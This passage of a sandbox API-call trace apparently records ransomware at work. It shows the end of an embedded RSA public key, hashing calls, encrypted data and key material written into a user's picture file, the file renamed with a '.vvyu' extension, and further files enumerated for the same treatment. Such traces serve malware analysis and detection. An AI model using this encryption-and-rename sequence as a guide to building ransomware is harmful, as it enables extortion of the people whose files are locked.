KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.552] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0199.553] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0199.553] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0199.553] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0199.553] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0199.553] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0199.553] GetLastError () returned 0x0 [0199.553] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0199.553] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0199.554] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0199.554] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0199.554] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0199.554] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0199.554] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0199.554] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0199.554] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0199.554] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10a40) returned 0x2ea79b0 [0199.555] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0199.555] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0199.555] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0199.555] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0199.555] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0199.555] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0199.555] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8f4f8 [0199.555] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3158 [0199.555] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8f540 [0199.556] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3170 [0199.556] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea31a0 [0199.556] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3200 [0199.556] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea31b8 [0199.556] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0199.556] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0199.556] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0199.556] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0199.556] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea31a0 | out: hHeap=0x620000) returned 1 [0199.556] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea31b8 | out: hHeap=0x620000) returned 1 [0199.556] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3200 | out: hHeap=0x620000) returned 1 [0199.557] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0199.557] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.557] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3200 [0199.557] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a00 [0199.557] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea31b8 [0199.557] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0199.557] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea31a0 [0199.557] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0199.557] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99c10 [0199.557] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0199.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0199.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0199.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99af8 [0199.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0199.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0199.558] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0199.558] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea31b8 | out: hHeap=0x620000) returned 1 [0199.558] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0199.558] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea31a0 | out: hHeap=0x620000) returned 1 [0199.558] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0199.558] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0199.558] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3200 | out: hHeap=0x620000) returned 1 [0199.559] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0199.559] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0199.559] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0199.559] GetCurrentThreadId () returned 0x66c [0199.559] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0199.559] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea6730 [0199.559] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9728 [0199.560] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0199.560] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0199.560] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0199.560] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0199.560] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0199.560] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.560] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.560] GetCurrentThreadId () returned 0x66c [0199.560] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.560] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.560] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0199.560] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.561] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.561] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.561] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.562] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0199.562] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0199.562] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0199.562] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaf50 [0199.562] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0199.562] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0199.562] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0199.562] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3200 [0199.562] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0199.562] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0199.562] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0199.562] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0199.562] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0199.562] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0199.563] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0199.563] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0199.563] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea31a0 [0199.563] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0199.563] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0199.563] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0199.563] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0199.563] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0199.563] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0199.563] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0199.563] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea31b8 [0199.563] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0199.563] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0199.563] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0199.563] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3188 [0199.563] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0199.563] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3218 [0199.563] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0199.563] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0199.564] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0199.564] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea31e8 [0199.564] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0199.564] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea31d0 [0199.564] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0199.564] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3230 [0199.564] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea31d0 | out: hHeap=0x620000) returned 1 [0199.564] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea31d0 [0199.564] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea31e8 | out: hHeap=0x620000) returned 1 [0199.564] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0199.564] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0199.564] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0199.564] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0199.564] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0199.564] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea31a0 | out: hHeap=0x620000) returned 1 [0199.564] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea31a0 [0199.564] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0199.564] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0199.564] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3200 | out: hHeap=0x620000) returned 1 [0199.564] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0199.565] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3230 | out: hHeap=0x620000) returned 1 [0199.565] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0199.565] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0199.565] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99d28 [0199.565] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0199.565] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0199.565] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea31a0 | out: hHeap=0x620000) returned 1 [0199.565] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0199.565] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0199.565] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0199.566] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0199.566] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0199.566] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0199.566] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0199.566] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0199.567] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0199.567] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.567] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0199.568] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0199.568] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0199.568] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea31d0 | out: hHeap=0x620000) returned 1 [0199.568] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0199.568] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3218 | out: hHeap=0x620000) returned 1 [0199.568] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0199.568] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea31b8 | out: hHeap=0x620000) returned 1 [0199.568] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3188 | out: hHeap=0x620000) returned 1 [0199.568] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0199.569] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9728 | out: hHeap=0x620000) returned 1 [0199.569] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0199.569] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3170 | out: hHeap=0x620000) returned 1 [0199.569] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8f540 | out: hHeap=0x620000) returned 1 [0199.569] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0199.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0199.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaf50 | out: hHeap=0x620000) returned 1 [0199.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0199.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0199.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0199.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0199.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0199.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0199.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0199.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0199.571] WriteFile (in: hFile=0x510, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0x10a3c, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0x10a3c, lpOverlapped=0x0) returned 1 [0199.573] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0199.573] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x10a41, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.573] WriteFile (in: hFile=0x510, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0199.573] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0199.573] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0199.573] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0199.573] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0199.573] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0199.574] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.574] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0199.574] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0199.574] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0199.575] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0199.575] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0199.575] CloseHandle (hObject=0x510) returned 1 [0199.576] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0199.576] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8a0) returned 0x2ea6a68 [0199.577] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0199.577] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\9OGpykt3_l8cM2Jx4cn.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\kir-tas9lgdeh fxubwy\\9ogpykt3_l8cm2jx4cn.jpg"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\9OGpykt3_l8cM2Jx4cn.jpg.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\kir-tas9lgdeh fxubwy\\9ogpykt3_l8cm2jx4cn.jpg.vvyu")) returned 1 [0199.578] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.578] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0199.578] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0199.581] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c6eb88 | out: hHeap=0x620000) returned 1 [0199.581] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2465a110, ftCreationTime.dwHighDateTime=0x1d89852, ftLastAccessTime.dwLowDateTime=0x744db970, ftLastAccessTime.dwHighDateTime=0x1d8a26f, ftLastWriteTime.dwLowDateTime=0x744db970, ftLastWriteTime.dwHighDateTime=0x1d8a26f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iIfMhH", cAlternateFileName="")) returned 1 [0199.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa6) returned 0x2c6eb88 [0199.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0199.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c0e0 [0199.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0199.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c6eb88 | out: hHeap=0x620000) returned 1 [0199.582] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9825c4f0, ftCreationTime.dwHighDateTime=0x1d89fc7, ftLastAccessTime.dwLowDateTime=0x92e76220, ftLastAccessTime.dwHighDateTime=0x1d8a08d, ftLastWriteTime.dwLowDateTime=0x92e76220, ftLastWriteTime.dwHighDateTime=0x1d8a08d, nFileSizeHigh=0x0, nFileSizeLow=0xa0cd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="v97V_KMwmgn4h6UDx.jpg", cAlternateFileName="V97V_K~1.JPG")) returned 1 [0199.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa6) returned 0x2c6eb88 [0199.583] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0199.583] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\v97V_KMwmgn4h6UDx.jpg") returned=".jpg" [0199.583] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\v97V_KMwmgn4h6UDx.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\kir-tas9lgdeh fxubwy\\v97v_kmwmgn4h6udx.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0199.583] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=41165) returned 1 [0199.583] VirtualAlloc (lpAddress=0x0, 